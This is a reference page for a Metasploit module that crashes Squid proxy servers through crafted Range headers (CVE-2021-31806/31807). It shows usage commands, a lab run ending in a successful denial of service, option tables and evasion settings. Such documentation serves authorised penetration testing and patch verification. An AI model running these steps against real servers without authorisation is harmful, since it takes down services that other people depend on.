Squid Proxy Range Header DoS - Metasploit


This page contains detailed information about how to use the auxiliary/dos/http/squid_range_dos metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Squid Proxy Range Header DoS
Module: auxiliary/dos/http/squid_range_dos
Source code: modules/auxiliary/dos/http/squid_range_dos.rb
Disclosure date: 2021-05-27
Last modification time: 2021-10-21 19:15:30 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 3128, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-31806, CVE-2021-31807

The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and 5.0.1-5.0.5 suffers from multiple vulnerabilities triggered by specific HTTP requests and responses. These vulnerabilities allow remote attackers to cause a denial of service through specifically crafted requests.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-service-down: Module may crash the service, and the service remains down.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


msf > use auxiliary/dos/http/squid_range_dos
msf auxiliary(squid_range_dos) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


This module exploits two vulnerabilities in the Squid Caching Proxy server and its handling of cached pages and the Range HTTP header.

Due to the way Squid handles the HTTP request header Range, an assertion can be caused due to a standard HTTP request. Once all of Squid's children workers have asserted, a Denial of Service of the proxy is achieved.

Vulnerable versions of Squid include: * 2.5.STABLE2-2.7.STABLE9. * 3.0-4.1.4. * 5.0.1-5.0.5.

Security bulletin from Squid: https://github.com/squid-cache/squid/security/advisories/GHSA-pxwq-f3qr-w2xf

Verification Steps


  1. Start msfconsole
  2. use auxiliary/dos/http/squid_range_dos.rb`
  3. Set `rhost
  4. Set rport
  5. run

Options


REQUEST_COUNT

REQUEST_COUNT is both the the number of HTTP requests which are sent to the server in order to perform the actual Denial of Service (i.e. accepted requests by the server), and the number of requests that are sent to confirm that the Squid host is actually dead.

CVE

This is the CVE that will be used to exploit the vulnerability. The default setting is CVE-2021-31806, but CVE-2021-31807 can also be chosen.

Scenarios


In this scenario the target server is running on the same host as Metasploit (192.168.159.128).
msf6 > use auxiliary/dos/http/squid_range_dos i msf6 auxiliary(dos/http/squid_range_dos) > set RHOSTS 192.168.159.128 RHOSTS => 192.168.159.128 msf6 auxiliary(dos/http/squid_range_dos) > set SRVHOST 192.168.159.128 SRVHOST => 192.168.159.128 msf6 auxiliary(dos/http/squid_range_dos) > show options

Module options (auxiliary/dos/http/squid_range_dos):

Name Current Setting Required Description


CVE CVE-2021-31806 yes CVE to check/exploit (Accepted: CVE-2021-31806, CVE-2021-31807) Proxies no A proxy chain of format type:host:port[,type:host:port][...] REQUEST_COUNT 50 yes The number of requests to be sent, as well as the number of re-tries to confirm a dead host RHOSTS 192.168.159.128 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 3128 yes The target port (TCP) SRVHOST 192.168.159.128 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host

Auxiliary action:

Name Description


DOS Perform Denial of Service Against The Target

msf6 auxiliary(dos/http/squid_range_dos) > run [*] Running module against 192.168.159.128

[] Sending 50 DoS requests to 192.168.159.128:3128 [] Using URL: http://192.168.159.128:8080/Sv2fFH3gmGeN4VC [] Sent first request to 192.168.159.128:3128 [] Sent DoS request 1 to 192.168.159.128:3128 [] Sent DoS request 2 to 192.168.159.128:3128 [] Sent DoS request 3 to 192.168.159.128:3128 [] Sent DoS request 4 to 192.168.159.128:3128 [] Sent DoS request 5 to 192.168.159.128:3128 [+] DoS completely successful. [] Server stopped. [] Auxiliary module execution completed msf6 auxiliary(dos/http/squid_range_dos) >

At this point, the target Squid server should be completely inaccessible: all children workers should have exited, and the main process should have also shut down.

Go back to menu.

Msfconsole Usage


Here is how the dos/http/squid_range_dos auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/http/squid_range_dos

msf6 auxiliary(dos/http/squid_range_dos) > show info

       Name: Squid Proxy Range Header DoS
     Module: auxiliary/dos/http/squid_range_dos
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2021-05-27

Provided by:
  Joshua Rogers

Module side effects:
 ioc-in-logs

Module stability:
 crash-service-down

Available actions:
  Name  Description
  ----  -----------
  DOS   Perform Denial of Service Against The Target

Check supported:
  No

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  CVE            CVE-2021-31806   yes       CVE to check/exploit (Accepted: CVE-2021-31806, CVE-2021-31807)
  Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
  REQUEST_COUNT  50               yes       The number of requests to be sent, as well as the number of re-tries to confirm a dead host
  RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT          3128             yes       The target port (TCP)
  SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT        8080             yes       The local port to listen on.
  SSL            false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                         no        The URI to use for this exploit (default is random)
  VHOST                           no        HTTP server virtual host

Description:
  The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and 
  5.0.1-5.0.5 suffers from multiple vulnerabilities triggered by 
  specific HTTP requests and responses. These vulnerabilities allow 
  remote attackers to cause a denial of service through specifically 
  crafted requests.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-31806
  https://nvd.nist.gov/vuln/detail/CVE-2021-31807
  https://blogs.opera.com/security/2021/10/fuzzing-http-proxies-squid-part-2/

Module Options


This is a complete list of options available in the dos/http/squid_range_dos auxiliary module:

msf6 auxiliary(dos/http/squid_range_dos) > show options

Module options (auxiliary/dos/http/squid_range_dos):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   CVE            CVE-2021-31806   yes       CVE to check/exploit (Accepted: CVE-2021-31806, CVE-2021-31807)
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   REQUEST_COUNT  50               yes       The number of requests to be sent, as well as the number of re-tries to confirm a dead host
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          3128             yes       The target port (TCP)
   SRVHOST        0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT        8080             yes       The local port to listen on.
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                         no        The URI to use for this exploit (default is random)
   VHOST                           no        HTTP server virtual host

Auxiliary action:

   Name  Description
   ----  -----------
   DOS   Perform Denial of Service Against The Target

Advanced Options


Here is a complete list of advanced options supported by the dos/http/squid_range_dos auxiliary module:

msf6 auxiliary(dos/http/squid_range_dos) > show advanced

Module advanced options (auxiliary/dos/http/squid_range_dos):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   ListenerComm                                                              no        The specific communication channel to use for this service
   SSLCipher                                                                 no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression        false                                               no        Enable SSL/TLS-level compression
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: A
                                                                                       uto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots            false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                   no        Host to use in URI (useful for tunnels)
   URIPORT                                                                   no        Port to use in URI (useful for tunnels)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the dos/http/squid_range_dos module can do:

msf6 auxiliary(dos/http/squid_range_dos) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   DOS   Perform Denial of Service Against The Target

Evasion Options


Here is the full list of possible evasion options supported by the dos/http/squid_range_dos auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/http/squid_range_dos) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Cannot connect to host.


Here is a relevant code snippet related to the "Cannot connect to host." error message:

84:	        count += 1
85:	        error_count = 0
86:	
87:	        next # Host could be completely dead, or just waiting for another Squid child.
88:	      elsif count == 0
89:	        print_error('Cannot connect to host.')
90:	        return
91:	      end
92:	
93:	      error_count += 1
94:	      next unless error_count > reqs # If we cannot connect after `res` amount of attempts, assume the DoS was successful.

Looks like the host is not vulnerable.


Here is a relevant code snippet related to the "Looks like the host is not vulnerable." error message:

100:	        name: name,
101:	        refs: references
102:	      )
103:	      return
104:	    end
105:	    print_error('Looks like the host is not vulnerable.')
106:	  end
107:	
108:	  def req(cve)
109:	    case cve
110:	    when 'CVE-2021-31806'

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Joshua Rogers

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.